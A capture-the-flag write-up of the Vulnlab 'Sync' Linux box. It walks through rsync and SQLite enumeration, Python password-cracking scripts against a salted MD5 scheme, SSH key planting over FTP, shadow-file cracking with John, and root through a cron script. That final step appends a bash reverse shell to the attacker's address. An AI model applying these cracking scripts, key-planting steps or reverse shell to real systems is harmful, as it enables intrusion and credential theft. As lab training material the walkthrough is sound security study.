Vulnlab Linux Easy: Sync

Sync is an Easy rated Linux machine on Vulnlab.

Nmap Scan

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p- 10.10.113.159 
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-01-30 15:18 CET
Nmap scan report for 10.10.113.159
Host is up (0.033s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c8:db:15:da:da:b6:be:5c:2a:9c:1a:4d:a0:39:cd:a2 (ECDSA)
|_  256 b1:4a:e4:5a:fc:83:1a:0c:36:07:45:75:72:43:f7:bb (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Login
|_http-server-header: Apache/2.4.52 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 42.61 seconds

Enumerate RSYNC (Port 873)

List shares using rsync.

┌──(kali㉿kali)-[~]
└─$ rsync -av --list-only rsync://10.10.113.159:873/                   
httpd           web backup

The listing shows a single module, httpd; the text after it, web backup, is that module's comment, not a second module. Asking for a module called web backup therefore fails:

┌──(kali㉿kali)-[~]
└─$ rsync -av --list-only 'rsync://10.10.113.159:873/web backup/' 
@ERROR: Unknown module 'web backup'
rsync error: error starting client-server protocol (code 5) at main.c(1863) [Receiver=3.2.7]

The httpd module itself lists without any authentication.

┌──(kali㉿kali)-[~]
└─$ rsync -av --list-only 'rsync://10.10.113.159:873/httpd'      
receiving incremental file list
drwxr-xr-x          4,096 2023/04/20 21:50:04 .
drwxr-xr-x          4,096 2023/04/20 22:13:22 db
-rw-r--r--         12,288 2023/04/20 21:50:42 db/site.db
drwxr-xr-x          4,096 2023/04/20 21:50:50 migrate
drwxr-xr-x          4,096 2023/04/20 22:13:15 www
-rw-r--r--          1,722 2023/04/20 22:02:54 www/dashboard.php
-rw-r--r--          2,315 2023/04/20 22:09:10 www/index.php
-rw-r--r--            101 2023/04/20 22:03:08 www/logout.php

sent 23 bytes  received 228 bytes  167.33 bytes/sec
total size is 16,426  speedup is 65.44

Pull the whole module down to a local directory.

┌──(kali㉿kali)-[~]
└─$ rsync -av 'rsync://10.10.113.159:873/httpd' ./httpd
receiving incremental file list
created directory ./httpd
./
db/
db/site.db
migrate/
www/
www/dashboard.php
www/index.php
www/logout.php

sent 123 bytes  received 16,850 bytes  11,315.33 bytes/sec
total size is 16,426  speedup is 0.97

The module is read-only, so rsync cannot be used to plant files on the server.

┌──(kali㉿kali)-[~/httpd]
└─$ rsync -av ../Important.txt 'rsync://10.10.113.159:873/httpd' 
sending incremental file list
ERROR: module is read only
rsync error: syntax or usage error (code 1) at main.c(1150) [Receiver=3.2.7]
rsync: [sender] read error: Connection reset by peer (104)

The db folder contains site.db, a SQLite database. Open it with sqlite3 and dump the users table.

┌──(kali㉿kali)-[~/httpd/db]
└─$ sqlite3 site.db        
SQLite version 3.44.0 2023-11-01 11:23:50
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> select * from users;
1|admin|7658a2741c9df3a97c819584db6e6b3c
2|triss|a0de4d7f81676c3ea9eabcadfd2536f6

index.php shows how the stored values are produced: the MD5 of a fixed secret, the username and the password, joined with '|'. The secret is hard-coded in the page, so every input to the hash except the password is known. (The same code interpolates the username straight into the SQL query, so the login form is also injectable, but the hash route is all that is needed here.)

<?php
session_start();
$secure = "6c4972f3717a5e881e282ad3105de01e";

if (isset($_SESSION['username'])) {
    header('Location: dashboard.php');
    exit();
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    $hash = md5("$secure|$username|$password");
    $db = new SQLite3('../db/site.db');
    $result = $db->query("SELECT * FROM users WHERE username = '$username' AND password= '$hash'");
    $row = $result->fetchArray(SQLITE3_ASSOC);
    if ($row) {
        $_SESSION['username'] = $row['username'];
        header('Location: dashboard.php');
        exit();
    } else {
        $error_message = 'Invalid username or password.';
    }
}

With the secret and the username known, a wordlist attack against the scheme is a few lines of Python.

#!/usr/bin/env python3

import hashlib

secure = "6c4972f3717a5e881e282ad3105de01e"
username = "triss"
triss_hash = "a0de4d7f81676c3ea9eabcadfd2536f6"

# rockyou.txt contains lines that are not valid UTF-8, so read it as bytes
# and hash the raw candidate instead of a decoded copy.
prefix = f"{secure}|{username}|".encode("utf-8")

with open('/usr/share/wordlists/rockyou.txt', 'rb') as file:
    for line in file:
        candidate = line.rstrip(b'\r\n')
        digest = hashlib.md5(prefix + candidate).hexdigest()

        if digest == triss_hash:
            print("Triss's password is: " + candidate.decode('utf-8', 'replace'))
            break

Output: Triss's password is: gerald
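The single-user loop above is the special case. The following is an added example (not the original post's script) that runs the same attack against every row of site.db and reads the wordlist as bytes, which the real rockyou.txt requires. It assumes the hash recipe shown in index.php, a users table with (id, username, password) columns, and that SECURE is the secret from the page.

```python
#!/usr/bin/env python3
"""Wordlist attack on the site's md5("secure|username|password") scheme.

Added example, not the original post's script. Assumed: the hash recipe from
index.php, a 'users' table with columns (id, username, password), and that
SECURE is the secret hard-coded in the page.
"""
import hashlib
import sqlite3
import sys
from typing import Dict, Iterable

SECURE = "6c4972f3717a5e881e282ad3105de01e"  # $secure from index.php


def site_hash(secure: str, username: str, password: bytes) -> str:
    """Reproduce PHP's md5("$secure|$username|$password") byte for byte."""
    return hashlib.md5(f"{secure}|{username}|".encode("utf-8") + password).hexdigest()


def load_users(db_path: str) -> Dict[str, str]:
    """Return {username: stored_hex_hash} from a copy of site.db."""
    con = sqlite3.connect(db_path)
    try:
        return {u: h for u, h in con.execute("SELECT username, password FROM users")}
    finally:
        con.close()


def crack(users: Dict[str, str], wordlist: Iterable[bytes], secure: str = SECURE) -> Dict[str, str]:
    """Try every wordlist entry against every user; return {username: password}.

    The username is part of the hashed string, so it behaves like a per-user
    salt: a candidate must be hashed once per user, and two users with the same
    password still get different hashes, so no cross-user lookup is possible.
    """
    targets = {u: h.lower() for u, h in users.items()}
    found: Dict[str, str] = {}
    for raw in wordlist:
        candidate = raw.rstrip(b"\r\n")
        for user, target in targets.items():
            if user in found:
                continue
            if site_hash(secure, user, candidate) == target:
                found[user] = candidate.decode("utf-8", "replace")
        if len(found) == len(targets):
            break
    return found


def iter_wordlist(path: str) -> Iterable[bytes]:
    # bytes, not str: rockyou.txt has lines that are not valid UTF-8
    with open(path, "rb") as fh:
        for line in fh:
            yield line


if __name__ == "__main__":
    db = sys.argv[1] if len(sys.argv) > 1 else "httpd/db/site.db"
    words = sys.argv[2] if len(sys.argv) > 2 else "/usr/share/wordlists/rockyou.txt"
    for user, password in crack(load_users(db), iter_wordlist(words)).items():
        print(f"{user}:{password}")
```

Run it as `python3 crack_site.py httpd/db/site.db /usr/share/wordlists/rockyou.txt`. Because the username is mixed into the hash, the cost grows with the number of accounts; the loop stops as soon as every account has been recovered.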

Gain shell

Password login over SSH is refused: the server only offers public-key authentication, so the recovered password is not enough on its own.

┌──(kali㉿kali)-[~]
└─$ ssh triss@10.10.113.159
The authenticity of host '10.10.113.159 (10.10.113.159)' can't be established.
ED25519 key fingerprint is SHA256:PfiTQiupGIW4nnLL5GrTOIUSd6IGaZQoq7QDiRsBlRc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.113.159' (ED25519) to the list of known hosts.
triss@10.10.113.159: Permission denied (publickey).

The same password does work for FTP.

┌──(kali㉿kali)-[~]
└─$ ftp triss@10.10.113.159    
Connected to 10.10.113.159.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Looks like we are in the home directory of the triss user.

ftp> ls -al
229 Entering Extended Passive Mode (|||10793|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.

The FTP session is rooted in triss's home directory and we have write access there, so we can drop an SSH public key in as .ssh/authorized_keys and turn the FTP foothold into a real shell. Generate a key pair and copy the public half to a file named authorized_keys. One caveat: sshd's default StrictModes rejects an authorized_keys file, .ssh directory or home directory that is group- or world-writable, so if login still fails afterwards, check the permissions of what FTP created (vsftpd's default local umask of 077 yields 0600 files and 0700 directories, which pass).

┌──(kali㉿kali)-[~]
└─$ ssh-keygen             
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:pwCdbFWdaDhhexu5pSgUvLnP60b6FmrI/LfGA14iJmc kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|     .. ++.o .   |
|     o.=o.o.o    |
|    . *o.o+ .    |
|     +o  o *     |
|      o.S =      |
|  . E +o+o       |
|   B + @..       |
|    + = X        |
|     o.B=+       |
+----[SHA256]-----+


┌──(kali㉿kali)-[~]
└─$ cp .ssh/id_rsa.pub authorized_keys

Now we can create the .ssh folder and put the authorized keys file in there.

ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||57014|)
150 Ok to send data.
100% |****************************************************************************************************************|   563        2.68 MiB/s    00:00 ETA
226 Transfer complete.

Time to SSH as triss.

┌──(kali㉿kali)-[~]
└─$ ssh triss@10.10.113.159               
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1023-aws x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/advantage>

  System information as of Tue Jan 30 15:18:00 UTC 2024

  System load:  0.0               Processes:             97
  Usage of /:   28.0% of 7.57GB   Users logged in:       0
  Memory usage: 21%               IPv4 address for eth0: 10.10.113.159
  Swap usage:   0%

 * Ubuntu Pro delivers the most comprehensive open source security and
   compliance features.

   <https://ubuntu.com/aws/pro>

 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     <https://ubuntu.com/pro>

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See <https://ubuntu.com/esm> or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

triss@ip-10-10-200-238:~$ id
uid=1003(triss) gid=1003(triss) groups=1003(triss)

Lateral movement

/backup holds many zip archives named with Unix timestamps, which suggests a scheduled job produces them. Copy one down with scp.

┌──(kali㉿kali)-[~]
└─$ scp triss@10.10.113.159:/backup/1706628241.zip .
1706628241.zip                                                                100% 5899   101.9KB/s   00:00

The archive contains copies of /etc/passwd and /etc/shadow alongside the web root and rsyncd.conf.

┌──(kali㉿kali)-[~]
└─$ unzip 1706628241.zip 
Archive:  1706628241.zip
   creating: tmp/backup/
  inflating: tmp/backup/rsyncd.conf  
   creating: tmp/backup/httpd/
   creating: tmp/backup/httpd/www/
  inflating: tmp/backup/httpd/www/dashboard.php  
  inflating: tmp/backup/httpd/www/logout.php  
  inflating: tmp/backup/httpd/www/index.php  
   creating: tmp/backup/httpd/migrate/
   creating: tmp/backup/httpd/db/
  inflating: tmp/backup/httpd/db/site.db  
  inflating: tmp/backup/passwd       
  inflating: tmp/backup/shadow

Use unshadow (shipped with John the Ripper) to merge passwd and shadow into a single file john can load.

┌──(kali㉿kali)-[~/tmp/backup]
└─$ unshadow passwd shadow > crack

Now crack the merged file with John the Ripper. Ubuntu 22.04 normally stores yescrypt ($y$) hashes, which john's native formats do not cover; --format=crypt falls back to the system's crypt(3), which handles any scheme libc supports but is slow, so keep the wordlist small or target specific accounts.

┌──(kali㉿kali)-[~/tmp/backup]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt crack --format=crypt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sakura           (sa)     
gerald           (jennifer)     
gerald           (triss)
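To make the two steps above concrete, here is an added example (not the post's tooling and not John's own code) that merges passwd and shadow the way unshadow does and names the crypt(3) scheme of each hash, which is what decides the --format to pass to john. The two sample files are constructed for the demonstration; their hash strings have the right shape but are not real password hashes.

```python
#!/usr/bin/env python3
"""Merge passwd and shadow like John's `unshadow`, and report each hash scheme.

Added example, not the original post's tooling. SAMPLE_PASSWD and
SAMPLE_SHADOW are constructed inputs; the hash strings are shaped like real
crypt(3) output but are not real password hashes.
"""
from typing import Dict, List

# crypt(3) prefix -> scheme. $y$ (yescrypt) is the Ubuntu 22.04 default and
# needs john's generic --format=crypt; $6$ is sha512crypt.
SCHEMES = {"$y$": "yescrypt", "$6$": "sha512crypt", "$5$": "sha256crypt",
           "$2b$": "bcrypt", "$2y$": "bcrypt", "$1$": "md5crypt"}

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sa:x:1001:1001::/home/sa:/bin/bash
triss:x:1003:1003::/home/triss:/bin/bash
"""
SAMPLE_SHADOW = """root:*:19400:0:99999:7:::
daemon:*:19400:0:99999:7:::
sa:$y$j9T$abcdefghijklmnop$ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:19400:0:99999:7:::
triss:$6$saltsalt$QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ:19400:0:99999:7:::
"""


def hash_scheme(field: str) -> str:
    """Name the crypt scheme of a shadow password field; 'locked' for *, ! and empty."""
    if field in ("", "*") or field.startswith("!"):
        return "locked"
    for prefix, name in SCHEMES.items():
        if field.startswith(prefix):
            return name
    return "descrypt" if len(field) == 13 else "unknown"


def unshadow(passwd_text: str, shadow_text: str) -> List[str]:
    """Return passwd lines with field 2 replaced by the matching shadow hash.

    Locked accounts are kept, as unshadow keeps them; john simply skips them.
    """
    hashes: Dict[str, str] = {}
    for line in shadow_text.splitlines():
        if line.strip():
            name, field = line.split(":", 2)[:2]
            hashes[name] = field
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        parts = line.split(":")
        parts[1] = hashes.get(parts[0], parts[1])  # keep 'x' if shadow has no entry
        merged.append(":".join(parts))
    return merged


def crackable(lines: List[str]) -> Dict[str, str]:
    """Map username -> scheme for every merged entry that carries a real hash."""
    result: Dict[str, str] = {}
    for line in lines:
        user, field = line.split(":", 2)[:2]
        scheme = hash_scheme(field)
        if scheme not in ("locked", "unknown"):
            result[user] = scheme
    return result


if __name__ == "__main__":
    merged = unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for user, scheme in crackable(merged).items():
        print(f"{user}: {scheme}")
```

Running it on the constructed samples reports sa as yescrypt and triss as sha512crypt; the two locked accounts are merged but not listed, matching the "Loaded 5 password hashes" style of output john gives when it ignores locked entries.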

Switch to the jennifer user.

triss@ip-10-10-200-238:~$ su jennifer
Password: 
jennifer@ip-10-10-200-238:/home/triss$ id
uid=1004(jennifer) gid=1004(jennifer) groups=1004(jennifer)

User flag: VL{bcf845cf94864fbba7e016d9fcd3a2db}

jennifer@ip-10-10-200-238:~$ cat user.txt 
VL{bcf845cf94864fbba7e016d9fcd3a2db}

Privilege Escalation

LinPEAS reveals a backup.sh script under /usr/local/bin.

════════════════════════════╣ Other Interesting Files                                                                                                    
╔══════════╣ .sh files in path
╚ <https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path>                                                                   
/usr/local/bin/backup.sh

The script is owned by sa rather than root, so whoever holds that account can change what it does.

jennifer@ip-10-10-200-238:/usr/local/bin$ ls -al
total 12
drwxr-xr-x  2 root root 4096 Apr 19  2023 .
drwxr-xr-x 10 root root 4096 Mar 25  2023 ..
-rwxr-xr-x  1 sa   sa    211 Apr 19  2023 backup.sh
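The finding above is one instance of a general check: a script in a system directory that a non-root user owns or can write to. The following is an added example (not LinPEAS and not part of the original post) that walks the PATH directories and flags scripts that are not root-owned, are group- or world-writable, or sit in a directory that is. Which file suffixes count as scripts is an assumption made here.

```python
#!/usr/bin/env python3
"""Flag scripts on PATH that a privileged job may run but a non-root user controls.

Added example; not LinPEAS and not part of the original post. A script is
flagged if it is not owned by root, if its mode allows group/other writes, or
if its directory is owned by a non-root user or is group/other writable.
SCRIPT_SUFFIXES is an assumption about what counts as a script.
"""
import os
import stat
from typing import List, Optional, Tuple

SCRIPT_SUFFIXES = (".sh", ".py", ".pl", ".rb")
GROUP_OR_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def classify(owner_uid: int, mode: int) -> Optional[str]:
    """Why an entry is controllable by a non-root user, or None if it is not."""
    if owner_uid != 0:
        return f"owned by uid {owner_uid}, not root"
    if mode & GROUP_OR_OTHER_WRITE:
        return "writable by group or others"
    return None


def audit_dir(directory: str) -> List[Tuple[str, str]]:
    """Return (path, reason) for each script in one directory that fails the check."""
    findings: List[Tuple[str, str]] = []
    try:
        dst = os.stat(directory)
        names = os.listdir(directory)
    except OSError:
        return findings  # missing or unreadable PATH entry: nothing to report
    dir_reason = classify(dst.st_uid, dst.st_mode)
    for name in names:
        if not name.endswith(SCRIPT_SUFFIXES):
            continue
        path = os.path.join(directory, name)
        try:
            st = os.stat(path)  # follow symlinks: what actually runs is what matters
        except OSError:
            continue
        reason = classify(st.st_uid, st.st_mode)
        if reason is None and dir_reason is not None:
            # the file itself looks fine, but anyone who controls the directory can replace it
            reason = f"directory is {dir_reason}"
        if reason is not None:
            findings.append((path, reason))
    return findings


def audit_path(path_env: str) -> List[Tuple[str, str]]:
    """Run audit_dir over every directory in a PATH-style string."""
    findings: List[Tuple[str, str]] = []
    for directory in path_env.split(os.pathsep):
        if directory:
            findings.extend(audit_dir(directory))
    return findings


if __name__ == "__main__":
    for path, reason in audit_path(os.environ.get("PATH", "")):
        print(f"{path}: {reason}")
```

On the box above, backup.sh (mode 755, owner sa, uid 1001) would be reported as "owned by uid 1001, not root"; a root-owned 755 script in a root-owned 755 directory produces no finding.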

Switch to the sa user (password: sakura).

jennifer@ip-10-10-200-238:/usr/local/bin$ su sa
Password: 
sa@ip-10-10-200-238:/usr/local/bin$ id
uid=1001(sa) gid=1001(sa) groups=1001(sa)

Append a reverse shell to the end of the script (10.8.1.49 is the attacker's VPN address). The script already copies /etc/shadow, so whatever runs it on a schedule must be root, and the same job will execute the added line.

sa@ip-10-10-200-238:/usr/local/bin$ cat backup.sh 
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
bash -c 'bash -i >& /dev/tcp/10.8.1.49/443 0>&1'

Start a listener on the port used in the payload; within about two minutes the job runs again and the callback arrives as root.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 443                                               
listening on [any] 443 ...
connect to [10.8.1.49] from (UNKNOWN) [10.10.113.159] 37356
bash: cannot set terminal process group (59531): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-200-238:~# id
uid=0(root) gid=0(root) groups=0(root)

Root flag: VL{1ce8506d2bec0abb03177353db237e1b}

root@ip-10-10-200-238:~# cat root.txt
VL{1ce8506d2bec0abb03177353db237e1b}

This post is licensed under CC BY 4.0 by the author.